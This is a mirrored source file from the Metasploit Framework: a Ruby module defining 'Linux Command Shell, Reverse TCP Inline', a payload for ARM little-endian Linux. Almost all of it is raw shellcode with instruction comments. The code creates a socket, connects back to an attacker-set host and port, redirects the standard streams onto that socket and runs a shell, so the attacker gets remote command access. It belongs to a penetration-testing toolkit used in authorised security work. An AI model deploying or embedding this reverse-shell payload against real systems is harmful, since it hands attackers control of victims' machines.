CoCalc -- shell_reverse

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/payloads/singles/linux/armle/shell_reverse_tcp.rb
Views: ¹¹⁷⁷⁹

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6

7
module MetasploitModule
8

9
  CachedSize = 172
10

11
  include Msf::Payload::Single
12
  include Msf::Payload::Linux
13
  include Msf::Sessions::CommandShellOptions
14

15
  def initialize(info = {})
16
    super(merge_info(info,
17
      'Name'          => 'Linux Command Shell, Reverse TCP Inline',
18
      'Description'   => 'Connect back to attacker and spawn a command shell',
19
      'Author'        => 'civ',
20
      'License'       => MSF_LICENSE,
21
      'Platform'      => 'linux',
22
      'Arch'          => ARCH_ARMLE,
23
      'Handler'       => Msf::Handler::ReverseTcp,
24
      'Session'       => Msf::Sessions::CommandShellUnix,
25
      'Payload'       =>
26
        {
27
          'Offsets' =>
28
            {
29
              'LHOST'    => [ 136, 'ADDR' ],
30
              'LPORT'    => [ 134, 'n' ],
31
            },
32
          'Payload' =>
33
            [
34
              #### Tested successfully on:
35
              # Linux 2.6.29.6-cm42 armv6l
36
              # Linux 2.6.29.6-cyanogenmod armv6l
37
              # Linux version 2.6.25-00350-g40fff9a armv5l
38
              # Linux version 2.6.27-00110-g132305e armv5l
39
              # Linux version 2.6.29-00177-g24ee4d2 armv5l
40
              # Linux version 2.6.29-00255-g7ca5167 armv5l
41
              #
42
              # Probably requires process to have INTERNET permission
43
              # or root.
44
              ####
45
              # socket(2,1,6)
46
              0xe3a00002,       # mov     r0, #2  ; 0x2
47
              0xe3a01001,       # mov     r1, #1  ; 0x1
48
              0xe2812005,       # add     r2, r1, #5      ; 0x5
49
              0xe3a0708c,       # mov     r7, #140        ; 0x8c
50
              0xe287708d,       # add     r7, r7, #141    ; 0x8d
51
              0xef000000,       # svc     0x00000000
52

53
              # connect(soc, socaddr, 0x10)
54
              0xe1a06000,       # mov     r6, r0
55
              0xe28f1060,       # 1dr     r1, pc, #96  ; 0x60
56
              0xe3a02010,       # mov     r2, #16 ; 0x10
57
              0xe3a0708d,       # mov     r7, #141        ; 0x8d
58
              0xe287708e,       # add     r7, r7, #142    ; 0x8e
59
              0xef000000,       # svc     0x00000000
60

61
              # dup2(soc,0) @stdin
62
              0xe1a00006,       # mov     r0, r6
63
              0xe3a01000,       # mov     r1, #0  ; 0x0
64
              0xe3a0703f,       # mov     r7, #63 ; 0x3f
65
              0xef000000,       # svc     0x00000000
66

67
              # dup2(soc,1) @stdout
68
              0xe1a00006,       # mov     r0, r6
69
              0xe3a01001,       # mov     r1, #1  ; 0x1
70
              0xe3a0703f,       # mov     r7, #63 ; 0x3f
71
              0xef000000,       # svc     0x00000000
72

73
              # dup2(soc,2) @stderr
74
              0xe1a00006,       # mov     r0, r6
75
              0xe3a01002,       # mov     r1, #2  ; 0x2
76
              0xe3a0703f,       # mov     r7, #63 ; 0x3f
77
              0xef000000,       # svc     0x00000000
78

79
              # execve("/system/bin/sh", args, env)
80
              0xe28f0024,       # add     r0, pc, #36     ; 0x24
81
              0xe0244004,       # eor     r4, r4, r4
82
              0xe92d0010,       # push    {r4}
83
              0xe1a0200d,       # mov     r2, sp
84
              0xe28f4024,       # add     r4, pc, #36     ; 0x10
85
              0xe92d0010,       # push    {r4}
86
              0xe1a0100d,       # mov     r1, sp
87
              0xe3a0700b,       # mov     r7, #11 ; 0xb
88
              0xef000000,       # svc     0x00000000
89

90
              # <af>:
91
              # port offset = 134, ip offset = 136
92
              0x04290002,       # .word   0x5c110002 @ port: 4444 , sin_fam = 2
93
              0x0101a8c0,       # .word   0x0101a8c0 @ ip: 192.168.1.1
94
              # <shell>:
95
              0x00000000,       # .word   0x00000000 ; the shell goes here!
96
              0x00000000,       # .word   0x00000000
97
              0x00000000,       # .word   0x00000000
98
              0x00000000,       # .word   0x00000000
99
              # <arg>:
100
              0x00000000,       # .word   0x00000000 ; the args!
101
              0x00000000,       # .word   0x00000000
102
              0x00000000,       # .word   0x00000000
103
              0x00000000,       # .word   0x00000000
104

105
            ].pack("V*")
106
        }
107
      ))
108

109
    # Register command execution options
110
    register_options(
111
      [
112
        OptString.new('SHELL', [ true, "The shell to execute.", "/bin/sh" ]),
113
        OptString.new('ARGV0', [ false, "argv[0] to pass to execve", "sh" ]) # mostly used for busybox
114
      ])
115
  end
116

117
  def generate(_opts = {})
118
    p = super
119

120
    sh = datastore['SHELL']
121
    if sh.length >= 16
122
      raise ArgumentError, "The specified shell must be less than 16 bytes."
123
    end
124
    p[140, sh.length] = sh
125

126
    arg = datastore['ARGV0']
127
    if arg
128
      if arg.length >= 16
129
        raise ArgumentError, "The specified argv[0] must be less than 16 bytes."
130
      end
131
      p[156, arg.length] = arg
132
    end
133

134
    p
135
  end
136
end
137

138

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

Product

Resources

Company

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more, all in one place.

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.